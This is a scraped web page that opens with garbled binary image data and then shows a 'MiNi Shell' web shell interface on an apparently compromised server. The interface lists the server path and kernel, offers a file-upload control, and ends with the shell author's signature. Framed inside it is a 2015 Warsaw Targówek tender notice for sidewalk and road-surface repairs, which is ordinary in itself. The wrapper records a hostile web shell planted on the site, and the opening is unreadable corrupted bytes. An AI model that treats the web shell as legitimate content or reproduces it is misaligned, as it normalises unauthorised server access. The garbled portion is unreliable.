JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150911/237518-N-2015.html

<p class="kh_header"><b>Warszawa: Remonty nawierzchni chodników w pasach dróg gminnych, na drogach będących w zarządzie m.st. Warszawy Dzielnicy Targówek.</b><br>
<b>Numer ogłoszenia: 237518 - 2015; data zamieszczenia: 11.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Targówek , ul. Ludwika Kondratowicza 20, 00-983 Warszawa, woj. mazowieckie, tel. 22 4438701, 22 4438696, faks 22 675 18 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.targowek.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty nawierzchni chodników w pasach dróg gminnych, na drogach będących w zarządzie m.st. Warszawy Dzielnicy Targówek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac do wykonania w ramach przedmiotu zamówienia obejmuje:
2.1. ROBOTY W ZAKRESIE BURZENIA (ROBOTY ROZBIÓRKOWE) - CPV 45111100-9
1)	rozebranie krawężników wraz z ławą podkrawężnikową oraz obrzeży,
2)	rozebranie istniejącej nawierzchni: z płyt chodnikowych betonowych o wymiarach 35x35x5 cm lub 50x50x7 cm, płyt betonowych drogowych sześciokątnych (trylinki), nawierzchni z asfaltu lanego itp.,
3)	usunięcie podsypki piaskowej lub cementowo-piaskowej,
4)	rozebranie podbudowy betonowej, z kruszywa łamanego lub naturalnego i usunięciu warstwy odsączającej, pogłębieniu, wyprofilowaniu i zagęszczeniu koryta,
5)	ułożenie z rozbiórki danego fragmentu nawierzchni (jeżeli nadaje się do ponownego wbudowania).
2.2. ROBOTY W ZAKRESIE BURZENIA (ROBOTY ZIEMNE) - CPV 45111100-9
1)	wykonywanie robót ziemnych wykonywane koparkami podsiębiernymi,
2)	mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni. 
2.3. ROBOTY W ZAKRESIE USUWANIA GRUZU (TRANSPORT GRUZU I MATERIAŁÓW 
       Z ODZYSKU)- CPV 45111220-6
1)	wywiezienie gruzu spryzmowanego samochodami samowyładowczymi - określa wykonawca jako element przetargu,
2)	transport materiałów sztukowych o masie do 50 kg pojazdami skrzyniowymi z załadunkiem i wyładunkiem ręcznym. Transport materiałów z odzysku z budowy do magazynu lub z magazynu na budowę - określa wykonawca jako element przetargu
2.4. ROBOTY W ZAKRESIE PRZYGOTOWANIA TERENU POD BUDOWĘ 
I ROBOTY ZIEMNE - CPV 45111200-0
1)	oczyszczenie terenu z pozostałości po wykarczowaniu (drobne gałęzie, korzenie i kora bez wrzosu) z wywiezieniem,
2)	roboty ziemne wykonywane koparkami podsiębiernymi,
3)	mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni.
2.5. FUNDAMENTOWANIE ULIC (PODBUDOWA) - CPV 45233330-1
1)	mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, 
2)	ułożenie nowej warstwy odsączającej i podbudowy z kruszywa łamanego lub naturalnego, jeżeli uprzednio zostały rozebrane,
3)	ułożenie podsypki piaskowej lub pospółki z zagęszczeniem mechanicznym - 10 cm grubość warstwy po zagęszczeniu, 
4)	ułożenie podsypki cementowo-piaskowej z zagęszczeniem mechanicznym - 5 cm grubość warstwy po zagęszczeniu.
2.6. FUNDAMENTOWANIE ULIC (PODBUDOWY - NAWIERZCHNIE NIEULEPSZONE)
        - CPV 45233330-1
1)	ułożenie nawierzchni z tłucznia kamiennego (materiał kwarcytowy)* - warstwa dolna z tłucznia - grubość po zagęszczeniu 10 cm, 
2)	wypełnienie tłuczniem (materiał kwarcytowy) rowów odwadniających bez zagęszczania mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, 
3)	wykonanie remontu nawierzchni z tłucznia kamiennego (materiał kwarcytowy) - warstwa górna z tłucznia - grubość po zagęszczeniu 7 cm,
4)	wykonanie remontu cząstkowego nawierzchni tłuczniowej (materiał kwarcytowy) 
- mechaniczne zagęszczenie tłucznia - głębokość wyboi do 5 cm, 
5)	profilowanie z wałowaniem nawierzchni gruntowych i tłuczniowych,
6)	profilowanie z wałowaniem nawierzchni gruntowych i tłuczniowych z wodą.
2.7. ROBOTY W ZAKRESIE NAWIERZCHNI ULIC - CPV 45233252-0
1)	wykonanie nawierzchni z betonowej kostki brukowej grubości 8 cm koloru szarego oraz koloru czerwonego na zjazdach i zatokach postojowych, na podsypce piaskowej lub cementowo-piaskowej,
2)	wykonanie nawierzchni z płyt drogowych betonowych sześciokątnych o grub. 15 cm z wypełnieniem spoin zaprawą. Wbudowanie materiału z odzysku, znajdującego się w magazynie,
3)	wykonanie nawierzchni z kostki kamiennej rzędowej o wys. 16 cm na podsypce żwirowej nowej. Wbudowanie materiału z odzysku, znajdującego się w magazynie.
2.8. FUNDAMENTOWANIE ULIC (ŁAWY I KRAWĘŻNIKI) - CPV 45233330-1
1)	wykonanie rowków pod krawężniki i ławy krawężnikowe o wym. 30x30 cm lub 30x40 cm,
2)	wykonanie ławy pod krawężniki betonowe z oporem,
3)	ustawienie nowych krawężników na ławie oraz obrzeży,
4)	krawężniki i obrzeża - wbudowanie materiału z odzysku, znajdującego się w magazynie. 
2.9. ROBOTY W ZAKRESIE CHODNIKÓW - CPV 45233222-1 
1)	wykonanie nawierzchni z betonowej kostki brukowej grubości 6 cm koloru szarego,
2)	wykonanie chodników z płyt betonowych 35x35x5 cm na podsypce piaskowej 
z wypełnieniem spoin zaprawą cementową. Wbudowanie materiału z odzysku, znajdującego się w magazynie,
3)	wykonanie chodników z płyt betonowych 50x50x7 cm na podsypce piaskowej 
z wypełnienie. spoin zaprawą cementową. Wbudowanie materiału z odzysku, znajdującego się w magazynie.

* - nie stosować materiałów wapiennych z dużą ilością frakcji ilasto-pylastych
2.10.  ROBOTY INSTALACYJNE WODNO-KANALIZACYJNE I SANITARNE
             (REGULACJA PIONOWA 	STUDZIENEK KANALIZACYJNYCH)
            - CPV 45330000-9 
1)	montaż pokryw włazów kanałowych (włazy na zawiasach lub wykonane z betonu lub żelbetu),
2)	regulacja pionowa studzienek dla włazów kanałowych,
3)	montaż kratek ściekowych ulicznych (kratki na zawiasach lub z tworzywa sztucznego),
4)	regulacja pionowa studzienek dla kratek ściekowych ulicznych.
2.11. ROBOTY INSTALACYJNE GAZOWE (REGULACJA ZAWORÓW GAZOWYCH) 
          - CPV 45333000-0
1)	regulacja pionowa studzienek dla zaworów gazowych.
2.12. ROBOTY INSTALACYJNE WODNO-KANALIZACYJNE I SANITARNE
          (REGULACJA ZAWORÓW WODOCIĄGOWYCH) - CPV 45330000-9
1)	regulacja pionowa studzienek dla zaworów wodociągowych.
2.13. INSTALOWANIE LINII TELEFONICZNYCH (REGULACJA STUDZIENEK   
        TELETECHNICZNYCH) - CPV 45314200-3
1)	regulacja pionowa studzienek dla studzienek telefonicznych.
2.14. ROBOTY W ZAKRESIE KSZTAŁTOWANIA TERENÓW ZIELONYCH 
         - CPV 45112710-5
1)	ręczne rozrzucenie ziemi żyznej lub kompostowej na skarpach o nachyleniu do 1:2 grubość warstwy 2 cm.
3. Szczegółowy zakres robót będący przedmiotem zamówienia określają:
3.1	 przedmiar robót wykonany w układzie kosztorysowym wg załącznika Nr 8 do SIWZ w wersji elektronicznej i drukowanej.  
3.2	specyfikacje techniczne wykonania i odbioru robót wg załącznika Nr 9 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>1.	Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy.
2.	Wielkość zamówień uzupełniających stanowić będzie nie więcej niż 50 % wartości zamówienia podstawowego i będzie polegać na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.12.20-6, 45.11.12.00-0, 45.23.33.30-1, 45.23.32.52-0, 45.23.32.22-1, 45.33.00.00-9, 45.33.30.00-0, 45.31.42.00-3, 45.11.27.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca składający ofertę zobowiązany jest do wniesienia wadium w wysokości 15 000,- zł (słownie: piętnaście tysięcy złotych).
2.	Wadium może być wniesione w jednej lub w kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze zobowiązaniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wyrażającego się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zamówienia, którego przedmiotem była - budowa, przebudowa, remont dróg o nawierzchniach rozbieralnych na drogach kategorii co najmniej gminnej o wartości brutto nie mniejszej niż 400 000,00 zł, (słownie: czterysta tysięcy złotych). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ww. warunek powinien spełniać co najmniej jeden z tych wykonawców lub wszyscy wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>co najmniej jedną osobą posiadającą uprawnienia 
do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ww. warunek powinien spełniać co najmniej jeden z tych wykonawców lub wszyscy wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają na rachunku bankowym środki finansowe lub zdolność kredytową na łączną kwotę nie mniejszą niż 450 000,00 zł (słownie: czterysta pięćdziesiąt tysięcy złotych). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ww. warunek powinien spełniać co najmniej jeden z tych wykonawców lub wszyscy wykonawcy wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-  ofertę, zgodną w treści z formularzem ofertowym stanowiącym załącznik nr 1 do SIWZ; - kosztorysem ofertowym opracowanym metodą szczegółową wraz z zestawieniami materiałów, sprzętu i robocizny, o którym mowa w Dziale XII ust. 1 pkt 2 SIWZ - załącznik nr 8 do oferty, - informacją o części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcy
W przypadku, gdy podwykonawca, o którym mowa w ust.8 pkt. 9, będzie jednocześnie innym podmiotem, na zasoby którego powołuje się Wykonawca na zasadach określonych w art. 26 ust. 2b ustawy w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy, wymagane jest podanie przez Wykonawcę nazwy (firmy) podwykonawcy - załącznik nr 9 do oferty. 
W przypadku nie wskazania części zamówienia, którego wykonanie Wykonawca zamierza powierzyć podwykonawcy, załączenie do oferty w/w załącznika nie jest wymagane; - pisemnym zobowiązaniem innych podmiotów do oddania Wykonawcy 
do dyspozycji niezbędnych zasobów w trakcie realizacji zamówienia, o którym mowa w Dziale VI ust. 1 pkt. 5 - załącznik nr 10 do oferty. W przypadku nie wskazania innych podmiotów, załączenie do oferty ww. załącznika nie jest wymagane; - W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo określające jego zakres podpisane przez osoby uprawnione do reprezentacji Wykonawcy. Pełnomocnictwo należy przedłożyć w oryginale lub notarialnie poświadczonej kopii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - długość gwarancji na przedmiot zamówienia - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	ZAMAWIAJĄCY zgodnie z art. 144 ustawy Pzp przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru WYKONAWCY 
w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej: 
1)	ZAMAWIAJĄCY dopuszcza zmiany podyktowane zmianą powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację umowy, 
2)	zmiany osób wskazanych do realizacji zamówienia, pod warunkiem, że osoby wskazane 
do przejęcia obowiązków wynikających z pełnionych funkcji będą posiadały przygotowanie 
co najmniej równe osobom dotychczas pełniących tę funkcję oraz będą spełniały wymogi określone w SIWZ,
3)	zaistnienia, po zawarciu umowy przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
a)	o charakterze niezależnym od stron,
b)	którego strony nie mogły przewidzieć przed zawarciem umowy,
c)	którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
d)	której nie można przypisać drugiej stronie;
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar 
i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
4)	zaistnienia okoliczności leżących po stronie ZAMAWIAJĄCEGO, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy.
5)	gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.
2.	Zamawiający dopuszcza zmianę Podwykonawców. W sytuacji, gdy Wykonawca, wykazując spełnienie warunku udziału w postępowaniu, polegał na zasobach innych podmiotów, które następnie brały udział w realizacji zamówienia jako podwykonawcy, w przypadku ich zmiany niezbędne jest wykazanie przez nowego podwykonawcę spełnienia warunku w zakresie nie mniejszym niż wykazany na etapie postępowania o udzielenie zamówienia publicznego.
3.	Zamawiający dopuszcza rezygnację Wykonawcy z Podwykonawcy. W sytuacji, gdy Wykonawca, wykazując spełnienie warunku udziału w postępowaniu, polegał na zasobach innych podmiotów, Wykonawca jest zobowiązany wykazać Zamawiającemu iż samodzielnie spełnia warunku udziału 
w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.targowek.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Dzielnicy Targówek 00-983 Warszawa, ul. Kondratowicza 20, pokój 301 piętro III . Opłata za dokumentację 20,00 zł. Płatne w kasie urzędu, banku lub za zaliczeniem pocztowym........</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2015 godzina 09:30, miejsce: w siedzibie Urzędu m.st. Warszawy dla Dzielnicy Targówek przy ulicy Kondratowicza 20 w Warszawie, w Wydziale Obsługi Mieszkańców - biuro podawcze (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com